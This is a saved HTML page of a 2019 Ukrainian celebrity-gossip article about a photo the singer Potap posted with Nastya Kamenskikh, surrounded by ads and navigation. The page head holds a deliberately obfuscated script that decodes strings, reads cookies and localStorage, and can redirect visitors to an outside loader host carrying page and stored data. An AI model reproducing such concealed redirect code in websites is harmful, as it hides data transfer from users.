<!doctype html>
<html class="no-js" lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<link rel="shortcut icon" href="/assets/images/favicons/favicon.ico" />
<link rel="apple-touch-icon" sizes="57x57" href="/assets/images/favicons/apple-touch-icon-57x57.png" />
<link rel="apple-touch-icon" sizes="60x60" href="/assets/images/favicons/apple-touch-icon-60x60.png" />
<link rel="apple-touch-icon" sizes="72x72" href="/assets/images/favicons/apple-touch-icon-72x72.png" />
<link rel="apple-touch-icon" sizes="76x76" href="/assets/images/favicons/apple-touch-icon-76x76.png" />
<link rel="apple-touch-icon" sizes="114x114" href="/assets/images/favicons/apple-touch-icon-114x114.png" />
<link rel="apple-touch-icon" sizes="120x120" href="/assets/images/favicons/apple-touch-icon-120x120.png" />
<link rel="apple-touch-icon" sizes="144x144" href="/assets/images/favicons/apple-touch-icon-144x144.png" />
<link rel="apple-touch-icon" sizes="152x152" href="/assets/images/favicons/apple-touch-icon-152x152.png" />
<link rel="apple-touch-icon" sizes="180x180" href="/assets/images/favicons/apple-touch-icon-180x180.png" />
<link rel="icon" type="image/png" sizes="192x192" href="/assets/images/favicons/android-icon-192x192.png" />
<link rel="icon" type="image/png" sizes="32x32" href="/assets/images/favicons/favicon-32x32.png" />
<link rel="icon" type="image/png" sizes="96x96" href="/assets/images/favicons/favicon-96x96.png" />
<link rel="icon" type="image/png" sizes="16x16" href="/assets/images/favicons/favicon-16x16.png" />
<link rel="manifest" href="/assets/images/favicons/manifest.json">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/assets/images/favicons/ms-icon-144x144.png" />
<meta name="theme-color" content="#ffffff">

<script></script>
<link rel="preload" as="style" href="/assets/css/app.min.css?v=42" disabled>
<script>!function(){function Et(){for(var t=arguments,r={},e=0;e<t.length;e+=2)r[t[e]]=t[e+1];return r}var Ct="",Ot="style",t="color",r="Height",e="R1cj",n="All",a="index",o="set",i="HM",It="opener",c="r",Mt="ver",u="AQABA",f="'",l="Int",Bt="disabled",Dt="grid",d="Style",A="query",v="Name",Rt="complete",m="2",h="al",s="Attribute",p="try",kt="console",Ft="loader",g="Elements",Nt="@",y="Child",jt="name",b="Of",Qt="length",Tt="link",Zt="warn",S="from",w="font",xt="Object",Ht="bind",E=".",C="remove",Lt="cookie",O="Tag",Ut="match",I='"',M="STC",qt="l",zt="data",B="R0l",D="natural",R="preload",Gt="location",k="GODlh",F="parent",Jt="src",N="<",j="Window",Q="*",Pt="debug",Vt="java",Wt="script",Xt="import",T="Element",Z="Own",Yt="random",x="timeout",H="Selector",_t="c",L="Computed",U="=",q="bold",Kt="id",z="Event",$t="h",tr=":",rr="atob",G="AAAQABAAACAk",J="NO",P="Descriptor",V=";",W="QBADs",X="gif",Y="IAAAAUEBAAAACw",_="-",K="DOMContent",er="loading",$="%",tt="m",nr="prototype",rt="append",ar="MSStream",or=",",ir="replace",cr="head",et="Item",nt="Listener",at="has",ur="f4FFv",fr="a",ot="green",it="background",ct="ttt",ut="AAA",ft="d1e",lr="cdn",dr="&",lt="weight",dt="image",Ar="Document",vr="floor",mr="type",hr="get",sr="String",At="com",vt="Content",mt="local",ht="S",pr="code",gr="Em",st="no",pt="Loaded",yr="document",br="call",Sr="base",gt="YXJnb24",yt="Timeout",bt="?",St="create",wt="/",wr="Storage",Er=">",Cr="close",Or="substr",Ir="href",Mr="(",Br="https",Dr="add",Rr="FRAME",kr="text",Fr="_",Nr="By",jr="Uza",Qr="Math",Tr="parse",Zr="IFRAME",xr="write",Hr="Node",Lr="ready",Ur="content",qr="State",zr=")",Gr=" ",Jr="ZZZ2m",Pr="Property",Vr="1",Wr="Image",Xr=Fr+tt,Yr=at+s,_r=Gr+f,Kr=f+V,$r=N+Ot+Er,te=wt+Q,re=Q+wt,ee=N+wt+Ot+Er,ne=hr+g+Nr+O+v,ae=D+r,oe=C+y,ie=F+Hr,ce=st+Gr+R+Gr+Ot,ue=K+pt,fe=p+Gr+M,le=it+Wr,de=I+zr,Ae=er+Gr+S+Gr+M,ve=M+Gr+x,me=st+Gr+M,he=kr+vt,se=(tr=tr,Mr+zr+V),pe=ct+Jr,ge=tr+dt+wt+X+V,ye=(or=or,Y+ut),be=B+k+u,Se=G+W+U,we=h+e+jr+i+U,Ee=(Fr=Fr,N+J),Ce=ht+Er,Oe=St+T,Ie=rt+y,Me=Ur+j,Be=hr+Z+Pr+P,De=Lr+qr,Re=gt+U,ke=m+U+Vr,Fe=$+_t,Ne=t+tr+ot+V+w+_+lt+tr+q,je=Dr+z+nt,Qe=A+H+n,Te=o+yt,Ze=Tr+l,xe=hr+L+d,He=mt+wr,Le=hr+et,Ue=a+b,qe=ft+U,ze=C+et,Ge=Br+tr+wt+wt,Je=E+At+wt+bt+c+U;dr=dr,function(t){try{var a=function(){};function o(){return Xr+L(U()*D*D)}function r(t){f(),z||(V=n(w),J=e(w),t())}function e(t){var r=u(Tt,Bt);return r&&r[Yr](Ir)?(P=r[Ir],i(Nt+R+_r+P+Kr,t)):r}function n(t){var r=u(Wt,mr,Ot);if(r)return i(r[kr],t)}function i(t,r){if(q($r+t+te+o()+re+ee),r)return u(Ot)}function c(t){return dt(t[Or](0,C),I)+Ct==t[Or](C)}function u(t,r,e){for(var n=A[ne](t),a=n[Qt];-1<--a;)if(!r||n[a][Yr](r)&&(!e||n[a][r]==e))return n[a]}function f(){ot[Rt]?ot[ae]||(z=w,J&&J[ie][oe](J),V&&V[ie][oe](V)):0<G--&&lt(f,w)}function l(){if(!V&&!J)return a(ce);if(K()==er)return it[br](A,ue,l);a(fe);var t=$(Ot);t[Kt]=W,ut[br](Y,t);var r=At(t)[le];if(ft[br](Y,t),r[Qt]>M)try{var e=rt(ht[br](st[br](ht[br](r,F),de,Ct),I*E));e&&(a(Ae),n(e))}catch(t){a(t)}else K()!=Rt?(a(ve),lt(l,B)):a(me);function n(t){var r=vt(),e=o(),n=Et($t,Y,_t,$,fr,ut,qt,P);d[qt+e]=n,r[s+Dt]=e;var a=o();r[he]=t,et[a]=ut[Ht](Y,r),et[Gt]=g+tr+a+se}}var d=window,A=d[yr],v=Rr,m=Pt,h=Vt,s=zt,p=Sr,g=h+Wt,y=pr,b=gr+y,S=0,w=1,E=2,C=3,O=10,I=8*E,M=O*O,B=I*I,D=B*B,R=Xt,k=p+I*E*E,F=B*C+C*(I+w),N=pe,j=ur,Q=Ft,T=Q+lr,Z=s+ge+k+or,x=ye,H=Z+be+x+Se,L=d[Qr][vr],U=d[Qr][Yt],q=function(t){A[xr](t)},z=S,G=I,J=S,P=Ct,V=S,W=we;try{if(d[It][Fr+N]==j)return d[It][Fr+N]=Ct,q(Ee+v+Ce),A[Cr]()}catch(t){}var X=A[Oe](Zr),Y=A[ne](cr)[0],_=o();X[jt]=_,Y[Ie](X);var K,$,tt,rt,et=_?d[_]:X[Me],nt=S;try{tt=et[yr]}catch(t){return}try{K=et[xt][Be](et[Ar][nr],De)[hr][Ht](A),$=tt[Oe][Ht](A),rt=et[rr],W=rt(W),nt=!!et[ar]}catch(t){nt=w}if(nt)return n(),e();var at=rt(Re);tt[Lt][Ut](at+Fr+m+ke)&&(a=et[kt][Zt][Ht](et[kt],Fe+b,Ne)),a(Mt,t);var ot=new et[Wr],it=tt[je],ct=(tt[Qe][Ht](A),et[Hr][nr]),ut=ct[Ie],ft=ct[oe],lt=(tt[ne][Ht](A),et[Te][Ht](d)),dt=et[Ze],At=et[xe][Ht](d),vt=$[Ht](A,Wt),mt=et[sr][nr],ht=mt[Or],st=mt[ir];q=tt[xr][Ht](A),L=et[Qr][vr],U=et[Qr][Yt],ot[Jt]=H;var pt=S,gt=et[He]||Et();for(var yt in gt)if(c(yt)){var bt=gt[Le](yt);bt[Qt]<M&&bt[Ue](qe)==S&&(gt[ze](yt),pt=Ge+T+Je+d[Gt]+dr+bt)}if(pt)return d[Gt]=pt;var St=o(),wt=vt();d[St]=r[Ht](d,l),wt[he]=St+se,ut[br](Y,wt)}catch(t){a(t)}}("1906091854")}();</script>
<script src="/assets/js/lib.top.min.js?v=42"></script>
<title>Потапа застали с &quot;неизвестной&quot; брюнеткой - ФОТО — Без Табу</title>
<meta name="title" content="Потапа застали с &quot;неизвестной&quot; брюнеткой - ФОТО — Без Табу" />
<meta name="description" content="Не так давно Потап оформил свои отношения с Настей Каменских. Однако в сети появился странный снимок…. Шоубиз — Без Табу" />
<link rel="canonical" href="https://beztabu.net/potapa-zastali-s-neizvestnoj-bryunetkoj---foto_n64590" />
<link rel="amphtml" href="https://beztabu.net/potapa-zastali-s-neizvestnoj-bryunetkoj---foto_n64590/amp">
<meta name="DC.date.issued" content="2019-07-06T18:18:00+03:00">
<meta property="og:title" content="Потапа застали с &quot;неизвестной&quot; брюнеткой - ФОТО" />
<meta property="og:description" content="" />
<meta property="og:site_name" content="Без Табу" />
<meta property="og:type" content="website" />
<meta property="og:image" content="https://beztabu.net/uploads/600x315_DIR/media_news/2019/07/5d20bbbc0d2c0437625343.png" />
<meta property="og:url" content="https://beztabu.net/potapa-zastali-s-neizvestnoj-bryunetkoj---foto_n64590" />
<meta property="fb:admins" content="100002197865474" />
<meta property="fb:app_id" content="252382338457552" />
<meta property="fb:pages" content="1770207246543325" />
<script type="application/ld+json">
            {
               "@context":"http://schema.org",
               "@type":"NewsArticle",
               "mainEntityOfPage":{
                  "@type":"WebPage",
                  "@id":"https://beztabu.net/potapa-zastali-s-neizvestnoj-bryunetkoj---foto_n64590"
               },
               "headline":"Потапа застали с &quot;неизвестной&quot; брюнеткой - ФОТО",
               "author":{
                  "@type":"Organization",
                  "name":"beztabu.net"
               },
               "publisher":{
                  "@type":"Organization",
                  "name":"beztabu.net",
                  "email":"support@beztabu.net",
                  "url":"https://beztabu.net/",
                  "logo":{
                     "@type":"ImageObject",
                     "url":"https://beztabu.net/assets/images/logo_60x60.png",
                     "width":60,
                     "height":60
                  }
               },
               "image":{
                  "@type":"ImageObject",
                  "url":"https://beztabu.net/uploads/696x391_DIR/media_news/2019/07/5d20bbbc0d2c0437625343.png",
                  "width":696,
                  "height":391
               },
               "datePublished":"2019-07-06 18:18:00",
               "dateModified":"2019-07-06 18:22:57"
            }

        </script>

<noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-WBTPQS"
                  height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
            new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
            j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
            '//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
    })(window,document,'script','dataLayer','GTM-WBTPQS');</script>

<script src="https://cdn.gravitec.net/storage/c85987e72f199e207f1730cb3104452b/client.js" async></script>
</head>
<body>

<script async src="https://cdn.onthe.io/io.js/a0bXiTIypLpq"></script>
<script>
    window._io_config = window._io_config || {};
    window._io_config["0.2.0"] = window._io_config["0.2.0"] || [];
    window._io_config["0.2.0"].push({
        page_url: window.location.href,
        page_url_canonical: "https://beztabu.net/potapa-zastali-s-neizvestnoj-bryunetkoj---foto_n64590",
        page_title: "Потапа застали с &quot;неизвестной&quot; брюнеткой - ФОТО — Без Табу",
        page_type: "article",
        page_language: "ru",
        article_authors: ["Денис Гаркавенко"],
        article_categories: ["Шоубиз"],
        article_type: "Новини",
        article_word_count: "215",
        article_publication_date: "Sat, 06 Jul 2019 18:18:00 +0300"
    });
    </script>

<script>
    var dfpAdSlots = [];
</script>
<header>
<div class="column small-4 medium-3 hide-for-large">
<div class="side-menu"></div>
</div>
<div class="column small-4 medium-6 large-3 large-offset-0 medium-offset-1 small-offset-2 logo-wrapper">
<a href="/" class="logo-link"> <img src="../assets/images/logo.svg" class="main-logo"></a>
<nav class="tag-link">
<div class="news-category">Звезды</div>
</nav>
</div>
<div class="navigation column show-for-large large-7 text-center">
<nav>
<a href="/novosti_t4952" class="" id="category_1">
новости
</a>
</nav>
<nav>
<a href="/shoubiz_t7103" class="" id="category_3">
шоубиз
</a>
</nav>
<nav>
<a href="https://beztabu.net/personi" class="" id="category_88">
персоны
</a>
</nav>
<nav>
<a href="https://beztabu.net/top-serials" class="" id="category_93">
сериалы
</a>
</nav>
<nav>
<a href="https://beztabu.net/partii" class="" id="category_92">
партии
</a>
</nav>
<nav class="more-category"><a class="">ЕЩЕ</a>
</nav>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/kino_t6755" class="sub-menu-item" id="category_65">
кино
</a>
<a href="https://beztabu.net/tele-show" class="sub-menu-item" id="category_89">
шоу
</a>
<a href="/zvezdy_t7577" class="sub-menu-item" id="category_51">
звезды
</a>
</div>
</div>
</div>
<div id="search-start-btn" class="sandwich-search-group column ">
<div class="sandwich-menu"></div>
<div class="search-icon"></div>
</div>
</header>
<div class="side-menu-block hide-for-large side-hide">
<div class="navigation text-center">
<nav>
<a href="/novosti_t4952" class="" id="category_1">
новости
</a>
</nav>
<nav>
<a href="/shoubiz_t7103" class="" id="category_3">
шоубиз
</a>
</nav>
<nav>
<a href="https://beztabu.net/personi" class="" id="category_88">
персоны
</a>
</nav>
<nav>
<a href="https://beztabu.net/top-serials" class="" id="category_93">
сериалы
</a>
</nav>
<nav>
<a href="https://beztabu.net/partii" class="" id="category_92">
партии
</a>
</nav>
<nav class="more-category"><a class="">ЕЩЕ</a>
</nav>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/kino_t6755" class="sub-menu-item" id="category_65">
кино
</a>
<a href="https://beztabu.net/tele-show" class="sub-menu-item" id="category_89">
шоу
</a>

<a href="/zvezdy_t7577" class="sub-menu-item" id="category_51">
звезды
</a>
</div>
</div>
</div>
</div>
<div class="full-page-menu">
<div class="close"></div>
<ul class="nav-block">
<li class="nav-lvl1">
<a href="/novosti_t4952">
Новости
</a>
<ul class="nav-lvl2">
<li>
<a href="/ukraina_t5229">
Украина
</a>
</li>
<li>
<a href="/mir_t5878">
Мир
</a>
</li>
<li>
<a href="/politika_t7561">
Политика
</a>
</li>
<li>
<a href="/sobytiya_t7562">
События
</a>
</li>
<li>
<a href="/publikacii_t4946">
Аналитика
</a>
</li>
<li>
<a href="/rossiya_t5024">
Россия
</a>
</li>
<li>
<a href="/lvov_t4976">
Львов
</a>
</li>
<li>
<a href="/dnepr_t5056">
Днепр
</a>
</li>
<li>
<a href="/odessa_t5007">
Одесса
</a>
</li>
<li>
<a href="/doneck_t5485">
Донецк
</a>
</li>
<li>
<a href="/ekonomika_t4982">
Экономика
</a>
</li>
<li>
<a href="/tehnologii_t6311">
Технологии
</a>
</li>
<li>
<a href="/gadzhety_t7401">
Гаджеты
</a>
</li>
<li>
<a href="/sport_t5156">
Спорт
</a>
</li>
</ul>
</li>
<li class="nav-lvl1">
<a href="/shoubiz_t7103">
Шоубиз
</a>
<ul class="nav-lvl2">
<li>
<a href="/novosti-serialov_t8467">
Сериалы online
</a>
</li>
<li>
<a href="/igra-prestolov_t7159">
Игра престолов
</a>
</li>
<li>
<a href="/holostyak-9_t8442">
Холостяк
</a>
</li>
<li>
<a href="/mastershef_t7318">
МастерШеф
</a>
</li>
<li>
<a href="/zvezdy_t7577">
Селебрити
</a>
</li>
<li>
<a href="/golos-krayini_t7189">
Голос країни
</a>
</li>
<li>
<a href="/liga-smeha_t7828">
Лига Смеха
</a>
</li>
<li>
<a href="/vechernij-kvartal_t8853">
Вечерний квартал
</a>
</li>
<li>
<a href="/h-faktor_t7275">
Х-Фактор
</a>
</li>
<li>
<a href="/top-model-po-ukrainski_t7976">
Топ-модель по-украински
</a>
</li>
</ul>
</li>
<li class="nav-lvl1">
<a href="https://beztabu.net/personi">
Персоны
</a>
<ul class="nav-lvl2">
</ul>
</li>
<li class="nav-lvl1">
<a href="https://beztabu.net/top-serials">
Сериалы
</a>
<ul class="nav-lvl2">
</ul>
</li>
<li class="nav-lvl1">
<a href="https://beztabu.net/partii">
Партии
</a>
<ul class="nav-lvl2">
</ul>
</li>
<li class="nav-lvl1">
<a href="/kino_t6755">
Кино
</a>
<ul class="nav-lvl2">
<li>
<a href="/recenzii_t8441">
Рецензии
</a>
</li>
<li>
<a href="/oskar-2019_t8488">
Оскар
</a>
</li>
<li>
<a href="/marvel_t7822">
Marvel
</a>
</li>
<li>
<a href="/novosti-kino_t8466">
Новости кино
</a>
</li>
</ul>
</li>
<li class="nav-lvl1">
<a href="https://beztabu.net/tele-show">
Шоу
</a>
<ul class="nav-lvl2">
</ul>
</li>
<li class="nav-lvl1">
<a href="/zvezdy_t7577">
Звезды
</a>
<ul class="nav-lvl2">
<li>
<a href="/ani-lorak_t5819">
Ани Лорак
</a>
</li>
<li>
<a href="/alla-pugacheva_t7646">
Алла Пугачева
</a>
</li>
<li>
<a href="/oleg-vinnik_t7612">
Олег Винник
</a>
</li>
<li>
<a href="/tina-karol_t7501">
Тина Кароль
</a>
</li>
<li>
<a href="/megan-markl_t7364">
Меган Маркл
</a>
</li>
<li>
<a href="/dzhastin-biber_t7548">
Джастин Бибер
</a>
</li>
<li>
<a href="/bejonse_t7239">
Бейонсе
</a>
</li>
<li>
<a href="/niki-minazh_t8215">
Ники Минаж
</a>
</li>
<li>
<a href="/kit-harington_t7534">
Кит Харингтон
</a>
</li>
<li>
<a href="/emiliya-klark_t7414">
Эмилия Кларк
</a>
</li>
<li>
<a href="/eminem_t7955">
Эминем
</a>
</li>
<li>
<a href="/sebastyan-kurc_t6776">
Себастьян Курц
</a>
</li>
</ul>
</li>
</ul>
<div class="social-group">
<a target="_blank" class="social facebook" href="https://www.facebook.com/beztabu.ua/"></a>
<a target="_blank" class="social twitter" href="https://twitter.com/UABezTabu"></a>
<a target="_blank" class="social telegram" href="https://t.me/beztabu"></a>
<a target="_blank" class="social rss" href="/rssAll.xml"></a>
</div>
</div>
<div class="full-page-search">
<div class="close"></div>
<form action="" class="search-form">
<input id="solr-news-search" type="text" placeholder="Поиск" class="form-text" autocomplete="off">
<div class="form-submit"></div>
</form>
</div>

<script>
    var showOverlayAdv = true;

    if (adCore.isSmallerThan(641)) {
        adCore.defineDfpSlot({
            'name': '/113579682/beztabu_mobileBranding',
            'sizes': [1, 1],
            'id': 'div-gpt-ad-1479289373107-0',
            'targeting': [
                ['pageType', adCore.getPageName()]
            ],
            'callback': function (e) {
                if(!e.isEmpty){
                    window.addEventListener("scroll", advScrollListener);
                    document.getElementById('mobile-branding').style.display = 'block';
                    document.getElementById('mobile-branding').style.borderBottom = '3px solid #0c4a72';
                } else {
                    initMobileBanner();
                }
            }
        });
    }

    function initMobileBanner() {
        adCore.defineDfpSlot({
            'name': '/56301415/bezTabu_320x50',
            'sizes': [[1, 1], [320, 50]],
            'id': 'div-gpt-ad-1474010090373-0',
            'targeting': [
                ['pageType', adCore.getPageName()]
            ],
            'callback': function (e) {
                if(!e.isEmpty) {
                    document.getElementById('bezTabu_320x50').style.display = 'block';
                    if (e.size[0] == 1) {
                        $('#mobile-320-ad-close').hide();
                    }
                }
            }
        });

        googletag.cmd.push(function () {
            googletag.display('div-gpt-ad-1474010090373-0');
        });
    }

    function advScrollListener() {
        if (window.scrollY > 300 && showOverlayAdv) {
            initMobileBanner();
            showOverlayAdv = false;
        }
    }
</script>
<div id="mobile-branding">
<div id="mobile-branding-wrapper" style="height: 0px">
<div id='div-gpt-ad-1479289373107-0'>
<script type='text/javascript'>
                if (adCore.isSmallerThan(640)) {
                    googletag.cmd.push(function () {
                        googletag.display('div-gpt-ad-1474010090373-0');
                    });
                }
            </script>
</div>
</div>
</div> <div id="bezTabu_320x50" class="mobile-320-ad">
<div id="mobile-320-ad-close">close</div>
<div id='div-gpt-ad-1474010090373-0'></div>
</div>
<script>
    $('#mobile-320-ad-close').click(function () {
        $('#bezTabu_320x50').hide();
    });
</script>
<div class="row">
<div class="columns medium-12 large-12 adv-970">
<script>
    if(adCore.isLargerThan(1000)) {
        adCore.defineDfpSlot({
            'name': '/56301415/bezTabu_970x90',
            'sizes': [[728, 90], [970, 90]],
            'id': 'div-gpt-ad-1465911679500-0',
            'targeting': adCore.targeting.getAll(),
            'callback': function(e) {
                if(!e.isEmpty) {
                    document.getElementById('bezTabu_970x90').style.display = 'block';
                }
            }
        });
    }
</script>
<div style="display:none;" id="bezTabu_970x90" class="reklama-970">
<div id='div-gpt-ad-1465911679500-0'>
<script type='text/javascript'>
            if (adCore.isLargerThan(1000)) {
                googletag.cmd.push(function() { googletag.display('div-gpt-ad-1465911679500-0'); });
            }
        </script>
</div>
</div>
</div>
<div class="columns large-8 main-content">
<div id="ontheioViewTacking" class="news-wrapper " data-author="Денис Гаркавенко" data-tags="Новина, Потап, Настя Каменских, Киев, измена, Шоубиз, Звезды">
<div class="top-tags-wrapper">
<a class="tags-title " href="/top_t5"></a><div class="top-tags">
<a href="/vojna-na-donbasse_t5654" class="tags">война на Донбассе</a>
<a href="/pase_t5159" class="tags">ПАСЕ</a>
<a href="/vybory-v-radu-2019_t8494" class="tags">Выборы в Раду 2019</a>
<a href="/vladimir-zelenskij_t7430" class="tags">Владимир Зеленский</a>
</div>
</div>
<div class="news-page-title-h1">
<h1>Потапа застали с &quot;неизвестной&quot; брюнеткой - ФОТО</h1>
</div>
<div class="news-statistics">
<span>18:18</span>
<div class="news-sharing">
<a href="javascript:void(0)" class="comments"></a>
<a onclick="socialPlugin.socialShareOpenWindow('http://www.facebook.com/sharer/sharer.php?u=https://beztabu.net/potapa-zastali-s-neizvestnoj-bryunetkoj---foto_n64590');" href="javascript: void(0);" class="facebook soc_counter_fb_64590">
<span class="facebook-count counter"></span>
</a>
<a onclick="socialPlugin.socialShareOpenWindow('http://twitter.com/share?text=\u041F\u043E\u0442\u0430\u043F\u0430\u0020\u0437\u0430\u0441\u0442\u0430\u043B\u0438\u0020\u0441\u0020\u0022\u043D\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043D\u043E\u0439\u0022\u0020\u0431\u0440\u044E\u043D\u0435\u0442\u043A\u043E\u0439\u0020\u002D\u0020\u0424\u041E\u0422\u041E&url=https://beztabu.net/potapa-zastali-s-neizvestnoj-bryunetkoj---foto_n64590');" href="javascript: void(0);" class="twitter soc_counter_tw_64590">
<span class="twitter-count counter"></span>
</a>
<script>
    var update = {};
    update.Social = function () {

        // to prevent double ajx execution o nnews page
        var prevShareUrl = null;
        var data = {};

        socialCountFormat = function (c) {
            if (c > 999) {
                c = (c / 1000).toFixed(1);
                if (c.toString().indexOf('.0') > 0) {
                    c = parseInt(c);
                }
                c = c + 'k';
            }
            return c;
        };

        return {
            init: function (params) {
                if (params == null || params.url == null) {
                    return;
                }
                if (prevShareUrl != null && prevShareUrl == params.url) {
                    return;
                }
                prevShareUrl = params.url;
                data = {
                    current_sum: params.current_sum,
                    fb: null,
                    tw: null,
                    vk: null,
                    gp: null,
                    news_id: params.news_id
                };
                if (params.vk != null) {
                    VK.indexes[VK.index] = params.vk;
                    var url = 'http://vk.com/share.php?act=count&url=' + encodeURIComponent(params.url) + '&index=' + VK.index + '&callback=?';
                    VK.index = VK.index + 1;
                    jQuery.getJSON(url);
                }
                if (params.fb != null) {
                    var url = 'https://graph.facebook.com/fql?q=' + encodeURIComponent('SELECT total_count FROM link_stat WHERE url="' + params.url + '"') + '&callback=?';
                    jQuery.getJSON(url, function (data) {
                        var count = data.data[0].total_count;
                        jQuery(params.fb).text(socialCountFormat(count));
                        if (count > 0) {
                            jQuery(params.fb).show();
                        }
                        var data = socialPlugin.getData();
                        data.fb = count;
                        socialPlugin.setData(data);
                        socialPlugin.check();
                    }, 'jsonp');
                }
                if (params.tw != null) {
                    var url = 'http://urls.api.twitter.com/1/urls/count.json?url=' + encodeURIComponent(params.url) + '&callback=?';
                    jQuery.getJSON(url, function (data) {
                        var count = data.count;
                        jQuery(params.tw).text(socialCountFormat(count));
                        if (count > 0) {
                            jQuery(params.tw).show();
                        }
                        var data = socialPlugin.getData();
                        data.tw = count;
                        socialPlugin.setData(data);
                        socialPlugin.check();
                    }, 'jsonp');
                }
                if (params.gp != null) {
                    var url = 'http://share.yandex.ru/gpp.xml?url=' + encodeURIComponent(params.url) + '&callback=?';
                    services.gplus.id = params.gp;
                    jQuery.getJSON(url, function (data) {
                    }, 'jsonp');
                }
            },

            check: function () {
                if (data.news_id == 0) return;
                if (data.fb == null) return;
                if (data.gp == null) return;
                if (data.vk == null) return;
                if (data.tw == null) return;
                var sum = data.fb + data.vk + data.tw + data.gp;
                if (Math.abs(data.current_sum - sum) >= 20) {
                    aaGet('news/updateShareCount.ajx?newsId=' + data.news_id, '');
                }
            },

            getData: function () {
                return data;
            },

            setData: function (d) {
                data = d;
            },

            socialShareOpenWindow: function (url) {
                var w = 760;
                var h = 625;
                if (url.indexOf('vk') > 0) {
                    w = 554;
                    h = 428;
                }
                else if (url.indexOf('facebook') > 0) {
                    w = 745;
                    h = 368;
                }
                else if (url.indexOf('twitter') > 0) {
//                        w = 745;
//                        h = 368;
                }
                else if (url.indexOf('google') > 0) {
                    w = 744;
                    h = 508;
                }
                window.open(url, 'social_share_window', 'height=' + h + ',width=' + w + ',toolbar=false,location=true,directories=false,status=true,resizable=true,scrollbars=true');
            }
        };

    };

    var socialPlugin = update.Social();
</script> </div>
</div>
<div class="news-photo  ">
<img src="https://beztabu.net/uploads/770x433_DIR/media_news/2019/07/5d20bbbc0d2c0437625343.png" title="Потапа застали с &quot;неизвестной&quot; брюнеткой - ФОТО - 1" alt="Потапа застали с &quot;неизвестной&quot; брюнеткой - ФОТО - фото 1">
<div class="photo-credits">Потапа застали с &quot;неизвестной&quot; брюнеткой - ФОТО
</div>
</div>
<p class="subtitle">
<strong>Не так давно Потап оформил свои отношения с Настей Каменских. Однако в сети появился странный снимок….</strong>
</p>
<div class="read-also"><a href="https://beztabu.net/potap-pyshno-gulyaet-svadbu-s-kamenskih-v-restorane-pod-kievom-foto_n63761">Потап ярко отгулял свадьбу с Каменских</a></div>
<p>Компрометирующее фото выложил сам певец.</p>
<p>"Miss u babe (с англ "Скучаю по тебе, малышка" – прим. ред)", - написал он в Instagram.</p>
<div class="news-photo" style="text-align: center;"><img alt="Потапа застали с 'неизвестной' брюнеткой - ФОТО - фото 183852" media-alt="183852" title="Потапа застали с 'неизвестной' брюнеткой - ФОТО - 183852" src="https://beztabu.net/uploads/640_DIR/media_news/2019/07/5d20b90182877331203607.jpg" /></div>
<p>Многие пользователи засомневались, Каменских ли это. Позже в незнакомке все же признали любовь Потапа.</p>
<div class="news-photo" style="text-align: center;"><img alt="Потапа застали с 'неизвестной' брюнеткой - ФОТО - фото 183853" media-alt="183853" title="Потапа застали с 'неизвестной' брюнеткой - ФОТО - 183853" src="https://beztabu.net/uploads/640_DIR/media_news/2019/07/5d20b9ff99fef598731197.PNG" /></div>
<p>А вот Виктор Павлик и вправду ушел от жены. И почти этого не скрывает. По словам новой пассии певца, он не спешит афишировать свои отношения.</p>
<p>"Уверен, что никто не воспримет это нормально. Что любой журналист попытается найти в этом что-то плохое: разницу в возрасте, развод с женой, болезнь сына... И он говорит: "У меня просто нет сил кому-то что-то доказывать, объяснять, как я тебя люблю. Это мое личное". Поэтому открываться сам он пока не готов".</p>
<p>Больше о счастливой паре <a href="https://beztabu.net/viktor-pavlik-brosil-zhenu-radi-molodenkoj---foto_n64377">читайте здесь. </a></p>
<div style="position: absolute; left: -99999px;">
<p>По словам пассии певца, Павлик не спешит афишировать свои отношения.</p>
<p>"Уверен, что никто не воспримет это нормально. Что любой журналист попытается найти в этом что-то плохое: разницу в возрасте, развод с женой, болезнь сына... И он говорит: "У меня просто нет сил кому-то что-то доказывать, объяснять, как я тебя люблю. Это мое личное". Поэтому открываться сам он пока не готов".</p>
<br />
https://beztabu.net/shoubiz_t7103</div>
<div class="telegram-block">
<a target="_blank" href="https://t.me/beztabu">
 <div class="telegram-icon">
<img src="../assets/images/icons/tg.svg" class="icon">
</div>
<div class="telegram-text">Подпишитесь на наш канал в Telegram и получайте подброку только
важных новостей!
</div>
</a>
</div>
<div class="news-tags">
<a href="/potap_t7273" class="tags">Потап</a>
<a href="/nastya-kamenskih_t7111" class="tags">Настя Каменских</a>
<a href="/kiev_t4988" class="tags">Киев</a>
<a href="/izmena_t7175" class="tags">измена</a>
<a href="/shoubiz_t7103" class="tags">Шоубиз</a>
<a href="/zvezdy_t7577" class="tags">Звезды</a>
</div>
<div class="row">
<script>
    if(adCore.isSmallerThan(640)) {
        adCore.defineDfpSlot({
            'name': '/56301415/bezTabu_320x50_afterArticle',
            'sizes': [[320, 100], [320, 50], [250, 250], [300, 250]],
            'id': 'div-gpt-ad-1465997560147-0',
            'targeting': adCore.targeting.getAll(),
            'callback': function(e) {
                if(!e.isEmpty) {
                    document.getElementById('bezTabu_320x50_afterArticle').style.display = 'block';
                }
            }
        });
    }
</script>
<div id="bezTabu_320x50_afterArticle" style="display: none;">
<div id='div-gpt-ad-1465997560147-0'>
<script type='text/javascript'>
            if (adCore.isSmallerThan(640)) {
                googletag.cmd.push(function() { googletag.display('div-gpt-ad-1465997560147-0'); });
            }
        </script>
</div>
</div>
</div>
<div class="news-source">
<a target="_blank" href="https://beztabu.net/" class="">Без табу</a>
<div class="news-sharing">
<a href="javascript:void(0)" class="comments"></a>
<a onclick="socialPlugin.socialShareOpenWindow('http://www.facebook.com/sharer/sharer.php?u=https://beztabu.net/potapa-zastali-s-neizvestnoj-bryunetkoj---foto_n64590');" href="javascript: void(0);" class="facebook soc_counter_fb_64590">
<span class="facebook-count counter"></span>
</a>
